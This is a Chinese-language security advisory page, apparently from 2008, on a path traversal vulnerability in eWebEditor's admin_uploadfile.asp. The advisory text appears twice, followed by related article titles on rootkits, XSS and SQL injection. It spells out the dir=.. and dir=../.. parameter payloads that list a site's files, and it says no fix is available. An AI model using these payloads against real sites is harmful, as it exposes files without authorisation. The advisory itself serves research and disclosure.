ewebeditor/admin_uploadfile.asp
过滤不严,造成遍历路径漏洞
测试方法:
[警 告]以下程序(方法)可能带有攻击性,仅供安全研究与教学之用.风险自负!
ewebeditor/admin_uploadfile.asp?id=14
在id=14后面添加&dir=..
再加 &dir=../..
&dir=http://www.****.com/../.. 看到整个网站文件了
建议:暂无http://www.ewebeditor.net/
eWebEditor遍历路径漏洞分析
时间:2008-01-16 14:35来源:中国网管联盟 作者:bitsCN整理 点击:次
ewebeditor/admin_uploadfile.asp
过滤不严,造成遍历路径漏洞
测试方法:
[警 告]以下程序(方法)可能带有攻击性,仅供安全研究与教学之用.风险自负!
ewebeditor/admin_uploadfile.asp?id=14
在id=14后面添加&dir=..
再加 &dir=../..
&dir=http://www.****.com/../.. 看到整个网站文件了
建议:暂无http://www.ewebeditor.net/
顶一下
(0)
0%
踩一下
(0)
0%
------分隔线----------------------------
- 最新评论 查看所有评论
-
- 发表评论 查看所有评论
-
- 推荐内容
-
- 整理一些ROOTKIT的资料
List: 一,前言 二,简介 三,rootkit的一些以公开的隐藏技术 四,一些隐藏技术的应对方...
- 关于跨域蠕虫的存在
这几天分析了几个大网站的XSSlt;iframe src=http://www.0×37.com/Project/csrf/do.as...
- JSP+Oracle SQL Injection之旅
SQL Injection可谓是长盛不衰的话题了,从ASP+MSSQL到PHP+MYSQL,一路走来也可谓是一...
- 简述Radmin软件提权技巧
最近做渗透测试时常碰到RADMIN一类的东西.. 一碰到此类的程序,一般我都会先看下对方把...
- 简单认识Anti-RootKit
在RK(rootkit)和ARK(anti-rootkit)的斗争已经进行了很久,在印象中最早出来的ARK工...
- ASP数据库插马小议
ASP数据库插马小议 By lake2 ( http://lake2.0x54.org ) 随着技术的发展,ASP数据库...
- 整理一些ROOTKIT的资料